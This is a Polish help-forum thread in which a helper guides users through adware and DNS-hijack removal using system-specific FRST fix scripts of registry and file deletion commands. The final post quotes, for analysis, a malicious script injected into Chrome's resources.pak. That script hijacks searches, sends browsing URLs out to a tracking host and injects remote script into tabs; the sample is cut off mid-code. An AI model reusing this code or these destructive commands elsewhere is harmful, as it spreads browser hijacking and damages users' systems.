picasso

1. AdwCleaner znalazł drobne klucze adware w rejestrze. Uruchom go ponownie, po kolei wybierz opcje Skanuj + Usuń. Gdy program ukończy czyszczenie: 2. Usń używane narzędzia za pomocą DelFix. Następnie wyczyść foldery Przywracania systemu. Obie akcje opisane tu: KLIK. 3. AdwCleaner wyraźnie wskazuje, że adware pochodzić mogło z "Asystenta pobierania" dobrychprogramów. Do wglądu wątek na co uważać: KLIK.

Proszę uruchamiaj FRST z Pulpitu (jak w pierwszym podejściu), a nie z folderu C:\FRST\Logs. Ten katalog Logs to archiwum logów i dostarczasz ich kopie, a nie bieżące pliki utworzone w danej rundzie przez FRST. Sprawa infekcji DNS nadal nie jest rozwiązana. Kolejne podejście: 1. Otwórz Notatnik i wklej w nim: Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173 Tcpip\..\Interfaces\{2780f41b-4ea8-4a45-9ef1-0ce5c9afbc09}: [DhcpNameServer] 82.163.143.171 Tcpip\..\Interfaces\{5a1e0f2b-42f3-4f82-8c58-5bda93dfd834}: [DhcpNameServer] 82.163.143.171 Tcpip\..\Interfaces\{fec9119d-8c9f-484b-adc2-ca4b012f847b}: [DhcpNameServer] 82.163.143.171 CMD: ipconfig /flushdns Reboot: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

sphere, to właśnie już miało być zrobione: vs.

Brakuje pliku fixlog.txt z wynikami skryptu usuwającego. Dołącz ten plik, jest w tym samym folderze skąd uruchamiałeś FRST. Nie uruchamiaj przypadkiem skryptu po raz drugi.

Oczywiście użytkownik nie może usuwać tematów, to funkcja moderatora/administratora. A GMER sobie już odpuść. Załączyć go pewnie nie możesz, bo nie zostały wykonane kroki zapisu raportu jak w przyklejonym (opcja Kopiuj a nie bezpośrednie zapisz) i próbujesz ładować plik o rozszerzeniu *.LOG a nie *.TXT.

Temat w nieodpowiednim dziale. Przenoszę do Windows. EDIT: Co to za duplikowanie tematów i usuwanie logów? Duplikat do śmieci, przywracam usunięte logi FRST. Nic dziwnego. System jest zmordowany oprogramowaniem zabezpieczającym, startują wspólnie Avast Free Antivirus i Bezpieczny Internet 2015 (modyfikacja F-Secure). Zacznij od deinstalacji tego drugiego (jest starszy), choć nie wiem czy da radę to wykonać w Trybie awaryjnym. Jeśli nie będzie się dało, to odinstaluj Avast, po tym wejście w tryb normalny i pozbycie się Bezpiecznego.

Brakuje trzeciego obowiązkowego pliku FRST Shortcut. Widać infekcję plików systemowych dnsapi.dll (przy okazji także uszkodzony jscript9diag.dll), szkodliwe procesy i inne elementy instalacji adware oraz wątpliwy skaner-naciągacz SpyHunter. Działania wstępne do przeprowadzenia: 1. Zastosuj narzędzie RepairDNS. Na Pulpicie powstanie raport RepairDNS.txt. 2. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj SpyHunter. Jeśli programu nie będzie się dało odinstalować, skorzystaj z narzędzia SpyHunterCleaner. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CMD: fltmc detach bsdriver c: bsdriver R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34720 2016-04-05] () R2 Idippicch; C:\Users\Amelka\AppData\Roaming\Jeiijdoe\Jeiijdoe.exe [174480 2016-04-05] () S2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe shuz -f "C:\ProgramData\\CloudPrinter\\CloudPrinter.dat" -l -a S2 ktip; "C:\Program Files\ktip\ktip.exe" /s iid=6166472 did=APSFTuto4PC sid=11 ref=b490cf98-ca75-4a7d-4dc0-2d482b15d2ba-PolicyMac id=b2f57e148f4abea222d5c6496a3aef9c071b0ca53062305daeddda46a94c7f9b [X] S2 nytuqelezbt; C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31\knsd6865.tmpfs [X] S2 Odapt; "C:\Users\Amelka\AppData\Roaming\GiljuAdei\Jotraom.exe" -cms [X] S2 rijufoze; C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31\hnswA382.tmp [X] S2 rocufyky; C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31\jnsc8B74.tmp [X] S2 zigipyro; C:\Users\Amelka\AppData\Local\4C4C4544-1459853606-4810-8059-B7C04F314B31\qnsh6099.tmp [X] HKLM\...\Run: [spaceSoundPro] => "C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe" HKLM\...\Run: [iDSCCOMACE] => "C:\Program Files\SpaceSoundPro\idsccom_ACE.exe" HKLM\...\Run: [WINCOMEX7] => "C:\Program Files (x86)\sunnyday\wincom_EX7.exe" HKLM\...\Run: [iDSCCOMC33] => "C:\Program Files (x86)\Hostify\idsccom_C33.exe" HKLM\...\Run: [WINCOM5WV] => "C:\Program Files (x86)\sunnyday\wincom_5WV.exe" HKLM\...\Run: [iDSCCOMSGZ] => "C:\Program Files\SpaceSoundPro\idsccom_SGZ.exe" HKLM\...\Run: [iDSCCOM8IZ] => "C:\Program Files (x86)\Hostify\idsccom_8IZ.exe" HKLM-x32\...\Run: [apphide] => C:\Program Files (x86)\badu\uc.exe HKLM-x32\...\Run: [app] => C:\Program Files (x86)\badu\sys.exe HKLM-x32\...\Run: [sun21] => [X] BootExecute: autocheck autochk * sh4native Sh4Removal Task: {05FCEAEE-4C4B-4619-94D3-34FF1BF3EA71} - System32\Tasks\{0BB202A7-A1FF-45E7-89B2-533BCA656A58} => pcalua.exe -a "C:\Program Files\SpaceSoundPro\uninstaller.exe" Task: {107A63E9-C930-4015-8039-4F6DD3550450} - System32\Tasks\Savjy => C:\PROGRA~1\SERBIH~1\Koiqaed.bat Task: {1CDE0D8C-D449-477C-AE5F-31852B646DBF} - System32\Tasks\psv_Freeair => /c regedit.exe /s "C:\ProgramData\Konksolex\Redranit.reg" & del "C:\ProgramData\Konksolex\Redranit.reg" & SCHTASKS /Delete /TN "psv_Freeair" /F Task: {21139857-62C8-4E7E-B2AA-A030D79673AB} - System32\Tasks\psv_Zaamsolojob => /c regedit.exe /s "C:\ProgramData\Konksolex\Ranron.reg" & del "C:\ProgramData\Konksolex\Ranron.reg" & SCHTASKS /Delete /TN "psv_Zaamsolojob" /F Task: {40ED9B1E-A879-40FE-ADA8-93D7EA4DF853} - System32\Tasks\{C321EFD5-7986-4087-960B-903A6BC0EB89} => pcalua.exe -a C:\Users\Amelka\AppData\Local\4C4C4544-1459852975-4810-8059-B7C04F314B31\Uninstall.exe -d C:\Users\Amelka\AppData\Local\4C4C4544-1459852975-4810-8059-B7C04F314B31 Task: {44164B37-F2F6-42FB-A9BA-30E33A553A5F} - System32\Tasks\Browser Updater Task(Core) => C:\Program Files (x86)\QQBrowser\Update\Download\595B027AFE614670DDA14F95DD7814BB\Update\BrowserUpdate.exe Task: {B9630AC6-39A1-4FFA-AB31-1031023AE232} - System32\Tasks\eAHPeNhIUJCheckTask => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe Task: {CDB6849E-455A-46EA-9BAD-FE35B89ED289} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe [2016-03-29] () Task: {D0F61A61-B7C5-4E62-A01D-B33DC98E08AE} - System32\Tasks\psv_Zotair => /c regedit.exe /s "C:\ProgramData\Konksolex\Y--Fax.reg" & del "C:\ProgramData\Konksolex\Y--Fax.reg" & SCHTASKS /Delete /TN "psv_Zotair" /F Task: {D28425C8-CAAA-4401-8A55-DC07140C0BF1} - System32\Tasks\eAHPeNhIUJBrowserUpdateUA => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe Task: {D840E53A-D7E9-467B-A8A1-F525B6C86036} - System32\Tasks\eAHPeNhIUJBrowserUpdateCore => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Amelka\AppData\Roaming\Mozilla\Firefox\Profiles\to8bbm4r.default\extensions\arthurj8283@gmail.com CHR HomePage: Default -> search.mpc.am CHR StartupUrls: Default -> "search.mpc.am" C:\Program Files (x86)\4C4C4544-1459845417-4810-8059-B7C04F314B31 C:\Program Files (x86)\eAHPeNhIUJ C:\Program Files (x86)\SearchesToYesbnd C:\Program Files (x86)\WinTaske C:\ProgramData\CloudPrinter C:\ProgramData\Konksolex C:\ProgramData\Konksolexs C:\Users\Amelka\AppData\Local\4C4C4544-1459852975-4810-8059-B7C04F314B31 C:\Users\Amelka\AppData\Local\Tempfolder C:\Users\Amelka\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} C:\Users\Amelka\AppData\LocalLow\Company C:\Users\Amelka\AppData\Roaming\*.* C:\Users\Amelka\AppData\Roaming\eCyber C:\Users\Amelka\AppData\Roaming\GiljuAdei C:\Users\Amelka\AppData\Roaming\Jeiijdoe C:\Users\Amelka\AppData\Roaming\MCorp C:\Users\Amelka\AppData\Roaming\WinZiper C:\Users\Amelka\Downloads\*-dp*.exe C:\Users\Amelka\Downloads\*spyhunter* C:\Users\Amelka\Downloads\free-videos C:\Users\Amelka\Downloads\PerdanaKun_-_SpyHunter_4.3 C:\Users\Amelka\Downloads\SpyHunter_4.17.6.4336 [Eng] patch C:\Users\Public\Documents\eAHPeNhIUJ C:\WINDOWS\AF54923662584AC6A0435B5B89C6EB61.TMP C:\WINDOWS\system32\log C:\WINDOWS\system32\taz C:\WINDOWS\system32\Drivers\bsdriver.sys C:\WINDOWS\system32\Drivers\cherimoya.sys C:\WINDOWS\system32\Drivers\etc\hp.bak C:\WINDOWS\SysWOW64\findit.xml C:\WINDOWS\SysWOW64\sh4native.exe C:\WINDOWS\SysWOW64\Number of results Folder: C:\Users\Amelka\Documents\setup Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOMACE /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOMC33 /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOMSGZ /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SpaceSoundPro /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v IDSCCOM8IZ /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v app /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v apphide /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v WizzWifiHotspot /f CMD: ipconfig /flushdns CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść przeglądarki z adware: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie przeinstalować. Menu Historia > Wyczyść całą historię przeglądania. Wyłącz Firefox. Następnie klawisz z flagą Windows + R > w polu uruchom wklej komendę "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -p i ENTER. W menedżerz profilów skasuj drugi nieużywany profil. Google Chrome: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 5. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pola Addition i Shortcut, by powstały trzy logi. Dołącz też pliki fixlog.txt i RepairDNS.txt. Wypowiedz się czy nadal są jakieś problemy.

To nie ma żadnego związku z infekcją. Są tu tylko nieaktywne mini szczątki adware, które w żaden sposób nie mogą być powiązane. Logi FRST nie nadają się też do diagnostyki sprzętowej. Temat przenoszę do właściwego działu Hardware. Dane wymagane działem: KLIK. PS. Dopiero gdy zostanie rozwiązany problem główny, możesz wykonać drobne czyszczenie ze spoilera. Nie zajmuj się tym teraz, bo jest to akcja poziomu kosmetycznego i strata czasu w diagnostyce głównej.

Wszystko pomyślnie wykonane. Drobne poprawki + sprawdzenie dziwnego odczytu Winsock widocznego w raporcie FRST: Otwórz Notatnik i wklej w nim: SearchScopes: HKU\S-1-5-21-1728362779-2423392276-1017299573-1001 -> DefaultScope {ielnksrch} URL = FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [brak pliku] FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [brak pliku] RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\McAfee RemoveDirectory: C:\ProgramData\McAfee RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AcerSystem CMD: del /q C:\AVScanner.ini CMD: del /q "C:\Users\Jaco\AppData\Roaming\Microsoft\Windows\SendTo\Znajomy Xfire.lnk" Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Reg: reg query HKLM\SYSTEM\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries /s Reg: reg query HKLM\SYSTEM\CurrentControlSet\services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64 /s Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Ale ja w ogóle nie ruszam drukarki HP. Zalecony do deinstalacji program "Badanie mające na celu poprawę produktów HP Deskjet 2540 series" to zbędny program kolekcjonujący dane o sytemie i wysyłający raporty w eter. Kompletnie zbędny do obsługi drukarki. Był uruchamiany GMER. Sprawdź czy transfer dysku nie obniżył sę do PIO. Instrukcje w ustępie Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. Po wykonaniu tych działań daj znać czy nastąpiła poprawa, gdyż może pakietu G Data nie trzeba usuwać. PS. Fix FRST wprawdzie wykonany, ale trochę nie zgadzają się wyniki (braki obiektów które wcześniej były). Zostały do wykonania tylko mini poprawki, ale to potem, bo nie jest to aż tak istotne.

Komentarze do starego tematu: LowcaAndroidow 1. Nie dołączyłeś w skrypcie usuwania katalogów PriceFountain z dysku. Jeden z nich widać w następujących sekcjach: ==================== Jeden miesiąc - utworzone pliki i foldery ======== 2016-02-20 11:07 - 2016-02-20 11:07 - 00000000 ____D C:\Users\jakub-zegarlicki\AppData\Local\TreasonsHayers ==================== Załadowane moduły (filtrowane) ============== 2016-02-20 05:01 - 2016-02-20 05:01 - 00356864 _____ () C:\Users\jakub-zegarlicki\AppData\Local\TreasonsHayers\SuspiciouslyMarketplace.dll 2. Czynności związane z Firefox zbędne i wykreślam z Twojej instrukcji. Przeglądarka nie była w ogóle zainstalowana (brak wykrytego profilu w FRST, brak wejścia instalacyjnego w Addition, brak skrótów w Shortcut). Klucze Mozilla i MozillaPlugins widziane w raporcie FRST są tworzone "na zapas" przez aplikacje, niezależnie od tego czy w ogóle przeglądarka kiedykolwiek była instalowana. 3. Poniższe pliki były poprawne. To pliki Samsunga związane prawdopodobnie z raportami pod konfigurację BIOS. C:\ProgramData\MakeMarkerFile.exe C:\ProgramData\MakeMarkerFile.xml Buckfast O ile w systemie nie nastąpiły już zmiany które mam na myśli, poprawki (strony wp.pl po "Asystencie pobierania" dobrychprogramów, katalogi PriceFountain, szczątki odinstalowanej Opery i puste skróty). Otwórz Notatnik i wklej w nim: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150513 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150513 HKU\S-1-5-21-4118013680-3836196915-2330699128-1001\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120150513 SearchScopes: HKU\S-1-5-21-4118013680-3836196915-2330699128-1001 -> DefaultScope {3CD242FD-3221-4896-B3F0-1AB473ED083A} URL = SearchScopes: HKU\S-1-5-21-4118013680-3836196915-2330699128-1001 -> {3CD242FD-3221-4896-B3F0-1AB473ED083A} URL = Task: {2D6ADD23-BA7A-4976-A28B-55E97BA76C52} - System32\Tasks\Opera scheduled Autoupdate 1452859431 => C:\Program Files (x86)\Opera\launcher.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PL-2303 USB-Serial Driver C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sea of Destiny Frost Fall C:\Users\jakub-zegarlicki\AppData\Local\JanetSatiated C:\Users\jakub-zegarlicki\AppData\Local\TreasonsHayers C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). zaprezentuj wynikowy fixlog.txt.

Większość zadań wykonana, ale w przeglądarce Google Chrome ostały się przekierowania Ask: CHR HomePage: Default -> hxxp://www.search.ask.com/?gct=hp CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms} CHR DefaultSearchKeyword: Default -> search.ask.com CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms} Czy na pewno wykonałeś reset przeglądarki? I na wszelki wypadek podaj nowe raporty FRST, gdyż widziana sytuacja mogła się zmienić.

To nie wygląda na oryginalny raport AdwCleaner, tylko ponownie zapisany, gdyż przejścia do nowej linii są zniekształcone. Niemniej log nie wskazuje, by narzędzie coś wykryło. Upłynęło dużo czasu, w międzyczasie wydano też nowe wersje Google Chrome. Czy problemy z zamulaniem przeglądarki nadal mają miejsce?

Pro forma komentarz. Tak, problemem była modyfikacja pliku zasobów Google Chrome C:\Program Files\Google\Chrome\Application\[Wersja]\resources.pak. Oto zmodyfikowany frament (dostawiony szkodliwy skrypt): <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://moneyviking-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return [ ".*capacostarica.com.*",".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.yahoo.com.*rh=true.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.yahoo.com.*",".*ask\\.com.*",".*search.searchitknow.com.*",".*ask.com.*siteid=23199.*",".*ask.com.*siteid=23203.*",".*ask.com.*siteid=23209.*",".*ask.com.*siteid=23204.*",".*ask.com.*siteid=23210.*",".*ask.com.*siteid=28524.*",".*ask.com.*siteid=23200.*",".*ask.com.*siteid=28525.*",".*ask.com.*siteid=28531.*",".*ask.com.*siteid=23205.*",".*ask.com.*siteid=28532.*",".*ask.com.*siteid=29358.*",".*ask.com.*siteid=23211.*",".*ask.com.*siteid=28533.*",".*ask.com.*siteid=28526.*",".*ask.com.*siteid=23201.*",".*ask.com.*siteid=23207.*",".*ask.com.*siteid=23212.*",".*ask.com.*siteid=28529.*",".*ask.com.*siteid=29356.*",".*ask.com.*siteid=23202.*",".*ask.com.*siteid=23208.*",".*ask.com.*siteid=23213.*",".*ask.com.*siteid=28530.*",".*smartshopsave.com.*siteid=29357.*",".*bing.com.*IMZ-RZ.*",".*home.searchpile.com.*",".*au.smartshopsave.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*search.yahoo.com.*yhs-invalid.*",".*capn=ed_ui_.*_kw_004.*",".*au.ask.com.*28527.*",".*search.top-arama.com.*",".*search.yahoo.com.*spigot.*",".*search.yahoo.com.*greentree.*",".*smartshopsave.com.*siteid=23203.*",".*smartshopsave.com.*siteid=23199.*",".*smartshopsave.com.*siteid=23204.*",".*smartshopsave.com.*siteid=23209.*",".*smartshopsave.com.*siteid=23210.*",".*smartshopsave.com.*siteid=28524.*",".*smartshopsave.com.*siteid=23200.*",".*smartshopsave.com.*siteid=28525.*",".*smartshopsave.com.*siteid=28531.*",".*smartshopsave.com.*siteid=23205.*",".*smartshopsave.com.*siteid=28532.*",".*smartshopsave.com.*siteid=29358.*",".*smartshopsave.com.*siteid=23211.*",".*smartshopsave.com.*siteid=28533.*",".*smartshopsave.com.*siteid=28526.*",".*smartshopsave.com.*siteid=23201.*",".*smartshopsave.com.*siteid=23207.*",".*smartshopsave.com.*siteid=23212.*",".*smartshopsave.com.*siteid=28529.*",".*smartshopsave.com.*siteid=29356.*",".*smartshopsave.com.*siteid=23202.*",".*smartshopsave.com.*siteid=23208.*",".*smartshopsave.com.*siteid=23213.*",".*smartshopsave.com.*siteid=28530.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://moneyviking-a.akamaihd.net/MoneyViking/cr?t=BLGC&g=64f71bdb-fbe8-49a9-98bf-c99c836b7c85&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"},{host:"isearch.omiga-plus.",param:"q",oparam:"NA"},{host:"searches.omiga-plus.",param:"q",oparam:"NA"},{host:"istart.webssearches.",param:"q",oparam:"NA"},{host:"search.istartsurf.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete 